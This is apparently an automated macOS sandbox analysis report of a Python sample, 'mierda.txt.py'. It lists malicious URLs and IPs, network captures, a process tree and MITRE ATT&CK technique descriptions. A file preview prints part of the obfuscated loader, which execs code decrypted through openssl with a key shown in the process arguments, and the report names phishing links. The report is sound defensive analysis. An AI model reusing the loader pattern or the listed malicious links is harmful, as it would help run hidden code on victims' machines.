	https://ntta.org-pay-u5ch.sbs/us/	Get hash	malicious	Unknown	Browse	151.101.66.49
	https://klickskydd.skolverket.org/?url=https%3A%2F%2Fwww.gazeta.ru%2Fpolitics%2Fnews%2F2024%2F12%2F22%2F24684722.shtml&id=71de&rcpt=upplysningstjansten@skolverket.se&tss=1735469857&msgid=b53e7603-c5d3-11ef-8a2e-0050569b0508&html=1&h=ded85c63	Get hash	malicious	HTMLPhisher	Browse	151.101.1.229
	https://www.gazeta.ru/politics/news/2024/12/22/24684722.shtml	Get hash	malicious	HTMLPhisher	Browse	151.101.129.229
	https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtml	Get hash	malicious	HTMLPhisher	Browse	151.101.1.229
	rrr	Get hash	malicious	Unknown	Browse	151.101.195.6
	https://www.ecorfan.org/	Get hash	malicious	Unknown	Browse	151.101.194.137
FASTLYUS	http://hotelyetipokhara.com	Get hash	malicious	Unknown	Browse	151.101.67.1
	https://realpaperworks.com/wp-content/red/UhPIYa	Get hash	malicious	Unknown	Browse	151.101.194.137
	http://boir.org	Get hash	malicious	Unknown	Browse	151.101.2.133
	https://share.hsforms.com/1ERkb7-8BRoi6cEFhMJVsvgt08ok	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://ntta.org-pay-u5ch.sbs/us/	Get hash	malicious	Unknown	Browse	151.101.66.49
	https://klickskydd.skolverket.org/?url=https%3A%2F%2Fwww.gazeta.ru%2Fpolitics%2Fnews%2F2024%2F12%2F22%2F24684722.shtml&id=71de&rcpt=upplysningstjansten@skolverket.se&tss=1735469857&msgid=b53e7603-c5d3-11ef-8a2e-0050569b0508&html=1&h=ded85c63	Get hash	malicious	HTMLPhisher	Browse	151.101.1.229
	https://www.gazeta.ru/politics/news/2024/12/22/24684722.shtml	Get hash	malicious	HTMLPhisher	Browse	151.101.129.229
	https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtml	Get hash	malicious	HTMLPhisher	Browse	151.101.1.229
	rrr	Get hash	malicious	Unknown	Browse	151.101.195.6
	https://www.ecorfan.org/	Get hash	malicious	Unknown	Browse	151.101.194.137

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
5c118da645babe52f060d0754256a73c	rrr	Get hash	malicious	Unknown	Browse	151.101.3.6 151.101.195.6 151.101.67.6
	ab_j	Get hash	malicious	Rust Stealer	Browse	151.101.3.6 151.101.195.6 151.101.67.6
	CGESrv	Get hash	malicious	CobaltStrike	Browse	151.101.3.6 151.101.195.6 151.101.67.6
	https://ivsmn.kidsavancados.com/	Get hash	malicious	Unknown	Browse	151.101.3.6 151.101.195.6 151.101.67.6
	18037.doc	Get hash	malicious	Unknown	Browse	151.101.3.6 151.101.195.6 151.101.67.6
	https://docs.google.com/presentation/d/e/2PACX-1vTBMx4bSFDj_B_GCJTdTqUpVgpLXyQPR3uFGYP9j81KKHswOSbzMWDM5ZByYtVAwpACe-iOzHmzehje/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	151.101.3.6 151.101.195.6 151.101.67.6
	Telegram	Get hash	malicious	Unknown	Browse	151.101.3.6 151.101.195.6 151.101.67.6
	https://fastbposolutions.com/language/overrides/message.alibaba.com/login.alibaba-com/saexy7ktc4fw1k7zk9xpnx19.php	Get hash	malicious	Unknown	Browse	151.101.3.6 151.101.195.6 151.101.67.6
	http://eocf.jyjwohl.ru/KIOJOJMAIEJFLVSF280212193270471103367JIGUHOIIAX4RQ0SVD?beunjabnkfaakr796013636449016227029WA5LIQI5PMNQO0EETOR	Get hash	malicious	Unknown	Browse	151.101.3.6 151.101.195.6 151.101.67.6
	https://commandes.maisonetstyles.com/Short/?Verification=aalborz_02@yahoo.com	Get hash	malicious	Unknown	Browse	151.101.3.6 151.101.195.6 151.101.67.6

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	Python script, ASCII text executable, with very long lines (13715)
Entropy (8bit):	6.0424277895191665
TrID:
File name:	mierda.txt.py
File size:	13'909 bytes
MD5:	0ca648abfff1b48d2ebebf365475df31
SHA1:	b715e20fe4b89bd14a185c701d0bd6adad8b0dc6
SHA256:	f355dfc3431924487c14cee5a1cd7c856028557ae8c8d4acadab7b36257a05e3
SHA512:	8a0155fc4bba223628a12709fcea52cd38c9540c84211fb978ac286fd4e65ec093a7ffff69871b23f6e76d65641387147c7c0eba872db1ba0880ea9153590ada
SSDEEP:	384:6Ss7SOy31luQU+5kwqWFLvgrI58nQCEiTw/5+2098Nc8fq9:64eQTpqN+uTEiK+2UJ8C9
TLSH:	1852C0655F4161642915E646D10E262D295CCE2E089CADEDCFF8D216032D9BE9DC874C
File Content Preview:	#!/usr/bin/env python.# -- coding: utf-8 --.import os.import getpass.import uuid..def get_uid():. return "".join(x.encode("hex") for x in (getpass.getuser() + "-" + str(uuid.getnode())))..exec("".join(os.popen("echo 'U2FsdGVkX18iPTlXFA4WeBWpjndA5UwTx

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 00:52:09.960887909 CET	49378	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:09.961004972 CET	443	49378	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:09.961602926 CET	49378	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:09.963543892 CET	49378	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:09.963602066 CET	443	49378	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:10.278330088 CET	443	49378	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:10.280283928 CET	49378	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.280340910 CET	49378	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.339476109 CET	49378	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.339636087 CET	443	49378	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:10.339987993 CET	443	49378	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:10.340178013 CET	49378	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.340507030 CET	49378	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.355705023 CET	49379	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.355777025 CET	443	49379	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:10.356445074 CET	49379	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.357747078 CET	49379	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.357799053 CET	443	49379	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:10.635530949 CET	443	49379	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:10.636805058 CET	49379	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.636903048 CET	49379	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.642695904 CET	49379	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.642726898 CET	443	49379	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:10.642805099 CET	443	49379	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:10.643290997 CET	49379	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.643378973 CET	49379	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.664401054 CET	49380	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.664421082 CET	443	49380	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:10.665394068 CET	49380	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.666685104 CET	49380	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.666735888 CET	443	49380	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:10.922408104 CET	49381	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.922470093 CET	443	49381	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:10.923074007 CET	49381	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.924120903 CET	49381	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.924171925 CET	443	49381	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:10.950578928 CET	443	49380	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:10.952451944 CET	49380	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.952519894 CET	49380	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.958915949 CET	49380	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.959095955 CET	443	49380	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:10.959428072 CET	443	49380	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:10.959619999 CET	49380	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.959973097 CET	49380	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.970432997 CET	49382	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.970506907 CET	443	49382	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:10.971128941 CET	49382	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.971833944 CET	49382	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:10.971890926 CET	443	49382	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:11.220432043 CET	443	49381	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:11.221863985 CET	49381	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:11.221978903 CET	49381	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:11.248080969 CET	49381	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:11.248265982 CET	443	49381	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:11.248716116 CET	443	49381	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:11.248806000 CET	49381	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:11.249206066 CET	49381	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:11.255808115 CET	443	49382	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:11.256567001 CET	49382	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:11.256622076 CET	49382	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:11.262826920 CET	49382	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:11.262981892 CET	443	49382	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:11.263348103 CET	443	49382	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:11.263529062 CET	49382	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:11.267057896 CET	49382	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:11.296684980 CET	49383	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:11.296772003 CET	443	49383	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:11.297348976 CET	49383	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:11.298093081 CET	49383	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:11.298146963 CET	443	49383	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:11.587992907 CET	443	49383	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:11.588824987 CET	49383	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:11.588881969 CET	49383	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:11.632222891 CET	49383	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:11.632281065 CET	443	49383	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:11.632356882 CET	443	49383	151.101.195.6	192.168.11.12
Jan 3, 2025 00:52:11.632961035 CET	49383	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:11.633198023 CET	49383	443	192.168.11.12	151.101.195.6
Jan 3, 2025 00:52:12.681904078 CET	49389	443	192.168.11.12	151.101.67.6
Jan 3, 2025 00:52:12.681921005 CET	443	49389	151.101.67.6	192.168.11.12
Jan 3, 2025 00:52:12.682629108 CET	49389	443	192.168.11.12	151.101.67.6
Jan 3, 2025 00:52:12.685077906 CET	49389	443	192.168.11.12	151.101.67.6
Jan 3, 2025 00:52:12.685090065 CET	443	49389	151.101.67.6	192.168.11.12
Jan 3, 2025 00:52:12.960227966 CET	443	49389	151.101.67.6	192.168.11.12
Jan 3, 2025 00:52:12.961025953 CET	49389	443	192.168.11.12	151.101.67.6
Jan 3, 2025 00:52:12.961323023 CET	49389	443	192.168.11.12	151.101.67.6
Jan 3, 2025 00:52:12.994113922 CET	49389	443	192.168.11.12	151.101.67.6
Jan 3, 2025 00:52:12.994240046 CET	443	49389	151.101.67.6	192.168.11.12
Jan 3, 2025 00:52:12.994328022 CET	443	49389	151.101.67.6	192.168.11.12
Jan 3, 2025 00:52:12.994930029 CET	49389	443	192.168.11.12	151.101.67.6
Jan 3, 2025 00:52:12.994930029 CET	49389	443	192.168.11.12	151.101.67.6
Jan 3, 2025 00:52:33.811660051 CET	49345	80	192.168.11.12	23.197.213.54
Jan 3, 2025 00:52:33.961386919 CET	80	49345	23.197.213.54	192.168.11.12
Jan 3, 2025 00:52:33.962727070 CET	49345	80	192.168.11.12	23.197.213.54
Jan 3, 2025 00:52:39.165235043 CET	49354	443	192.168.11.12	23.193.125.165
Jan 3, 2025 00:52:39.167452097 CET	49354	443	192.168.11.12	23.193.125.165
Jan 3, 2025 00:52:39.294544935 CET	443	49354	23.193.125.165	192.168.11.12
Jan 3, 2025 00:52:39.294611931 CET	443	49354	23.193.125.165	192.168.11.12
Jan 3, 2025 00:52:39.295222044 CET	49354	443	192.168.11.12	23.193.125.165
Jan 3, 2025 00:52:39.295275927 CET	49354	443	192.168.11.12	23.193.125.165
Jan 3, 2025 00:52:39.296674013 CET	443	49354	23.193.125.165	192.168.11.12
Jan 3, 2025 00:52:39.297173977 CET	49354	443	192.168.11.12	23.193.125.165
Jan 3, 2025 00:53:40.943681002 CET	49395	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:40.943748951 CET	443	49395	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:40.944603920 CET	49395	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:40.945986032 CET	49395	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:40.946003914 CET	443	49395	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:41.221432924 CET	443	49395	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:41.222198009 CET	49395	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.222310066 CET	49395	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.229165077 CET	49395	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.229213953 CET	443	49395	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:41.229335070 CET	443	49395	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:41.229895115 CET	49395	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.230003119 CET	49395	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.245723009 CET	49396	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.245753050 CET	443	49396	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:41.246340036 CET	49396	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.247256994 CET	49396	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.247276068 CET	443	49396	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:41.534246922 CET	443	49396	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:41.535042048 CET	49396	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.535125017 CET	49396	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.541486979 CET	49396	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.541547060 CET	443	49396	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:41.541627884 CET	443	49396	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:41.542232037 CET	49396	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.542300940 CET	49396	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.562025070 CET	49397	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.562046051 CET	443	49397	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:41.562793016 CET	49397	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.563815117 CET	49397	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.563828945 CET	443	49397	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:41.849586010 CET	443	49397	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:41.850353003 CET	49397	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.850353003 CET	49397	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.861861944 CET	49397	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.861892939 CET	443	49397	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:41.861972094 CET	443	49397	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:41.862432957 CET	49397	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.862494946 CET	49397	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.891889095 CET	49398	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.891907930 CET	443	49398	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:41.892515898 CET	49398	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.894634962 CET	49398	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:41.894646883 CET	443	49398	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:42.177437067 CET	443	49398	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:42.178795099 CET	49398	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:42.178849936 CET	49398	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:42.189165115 CET	49398	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:42.189326048 CET	443	49398	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:42.189704895 CET	443	49398	151.101.3.6	192.168.11.12
Jan 3, 2025 00:53:42.189929008 CET	49398	443	192.168.11.12	151.101.3.6
Jan 3, 2025 00:53:42.190196991 CET	49398	443	192.168.11.12	151.101.3.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 00:51:58.094374895 CET	53	56798	1.1.1.1	192.168.11.12
Jan 3, 2025 00:53:40.809428930 CET	57691	53	192.168.11.12	1.1.1.1
Jan 3, 2025 00:53:40.939730883 CET	53	57691	1.1.1.1	192.168.11.12

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 3, 2025 00:53:40.809428930 CET	192.168.11.12	1.1.1.1	0x15fa	Standard query (0)	h3.apis.apple.map.fastly.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 3, 2025 00:53:40.939730883 CET	1.1.1.1	192.168.11.12	0x15fa	No error (0)	h3.apis.apple.map.fastly.net	151.101.3.6	A (IP address)	IN (0x0001)	false
Jan 3, 2025 00:53:40.939730883 CET	1.1.1.1	192.168.11.12	0x15fa	No error (0)	h3.apis.apple.map.fastly.net	151.101.131.6	A (IP address)	IN (0x0001)	false
Jan 3, 2025 00:53:40.939730883 CET	1.1.1.1	192.168.11.12	0x15fa	No error (0)	h3.apis.apple.map.fastly.net	151.101.195.6	A (IP address)	IN (0x0001)	false
Jan 3, 2025 00:53:40.939730883 CET	1.1.1.1	192.168.11.12	0x15fa	No error (0)	h3.apis.apple.map.fastly.net	151.101.67.6	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: mono-sgen32 PID: 624, Parent PID: 537

General

Start time (UTC):	23:51:46
Start date (UTC):	02/01/2025
Path:	/Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32
Arguments:	-
File size:	3722408 bytes
MD5 hash:	8910349f44a940d8d79318367855b236

Chronological Activities

Analysis Process: mierda.txt.py PID: 624, Parent PID: 537

General

Start time (UTC):	23:51:46
Start date (UTC):	02/01/2025
Path:	/Users/bernard/Desktop/mierda.txt.py
Arguments:	/Users/bernard/Desktop/mierda.txt.py
File size:	13909 bytes
MD5 hash:	0ca648abfff1b48d2ebebf365475df31

Chronological Activities

Analysis Process: python PID: 624, Parent PID: 537

General

Start time (UTC):	23:51:46
Start date (UTC):	02/01/2025
Path:	/usr/bin/python
Arguments:	python /Users/bernard/Desktop/mierda.txt.py
File size:	66880 bytes
MD5 hash:	e8975ecc31cf18878c0e0bb943a33379

Chronological Activities

Analysis Process: Python PID: 624, Parent PID: 537

General

Start time (UTC):	23:51:46
Start date (UTC):	02/01/2025
Path:	/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Arguments:	python /Users/bernard/Desktop/mierda.txt.py
File size:	51744 bytes
MD5 hash:	710c6cc30780eea712240851b44d9eab

Chronological Activities

Analysis Process: sh PID: 625, Parent PID: 624

General

Start time (UTC):	23:51:46
Start date (UTC):	02/01/2025
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Chronological Activities

Analysis Process: sh PID: 626, Parent PID: 625

General

Start time (UTC):	23:51:46
Start date (UTC):	02/01/2025
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Chronological Activities

Analysis Process: ifconfig PID: 626, Parent PID: 625

General

Start time (UTC):	23:51:46
Start date (UTC):	02/01/2025
Path:	/sbin/ifconfig
Arguments:	/sbin/ifconfig
File size:	71984 bytes
MD5 hash:	0c60b4d4632aa1db59b69584e2a3b09b

Chronological Activities

Analysis Process: sh PID: 627, Parent PID: 624

General

Start time (UTC):	23:51:46
Start date (UTC):	02/01/2025
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Chronological Activities

Analysis Process: sh PID: 628, Parent PID: 627

General

Start time (UTC):	23:51:46
Start date (UTC):	02/01/2025
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Chronological Activities

Analysis Process: sh PID: 629, Parent PID: 627

General

Start time (UTC):	23:51:46
Start date (UTC):	02/01/2025
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Chronological Activities

Analysis Process: openssl PID: 629, Parent PID: 627

General

Start time (UTC):	23:51:46
Start date (UTC):	02/01/2025
Path:	/usr/bin/openssl
Arguments:	openssl aes-256-cbc -A -d -a -k 726f6f742d38373936373630303930303537 -md md5
File size:	1191440 bytes
MD5 hash:	99bad7d4348295bf9a3e457c7c4942b6

Chronological Activities

Analysis Process: xpcproxy PID: 647, Parent PID: 1

General

Start time (UTC):	23:52:09
Start date (UTC):	02/01/2025
Path:	/usr/libexec/xpcproxy
Arguments:	-
File size:	44048 bytes
MD5 hash:	4764d9eafe6b7dac23253a9f8b7f73d6

Chronological Activities

Analysis Process: eficheck PID: 647, Parent PID: 1

General

Start time (UTC):	23:52:09
Start date (UTC):	02/01/2025
Path:	/usr/libexec/firmwarecheckers/eficheck/eficheck
Arguments:	/usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon
File size:	74048 bytes
MD5 hash:	328beb81a2263449258057506bb4987f

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

macOS Analysis Report mierda.txt.py

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: mono-sgen32 PID: 624, Parent PID: 537

General

Chronological Activities

Analysis Process: mierda.txt.py PID: 624, Parent PID: 537

General

Chronological Activities

Analysis Process: python PID: 624, Parent PID: 537

General

Chronological Activities

Analysis Process: Python PID: 624, Parent PID: 537

General

Chronological Activities

Analysis Process: sh PID: 625, Parent PID: 624

General

Chronological Activities

Analysis Process: sh PID: 626, Parent PID: 625

General

Chronological Activities

Analysis Process: ifconfig PID: 626, Parent PID: 625

General

Chronological Activities

Analysis Process: sh PID: 627, Parent PID: 624

macOS Analysis Report
mierda.txt.py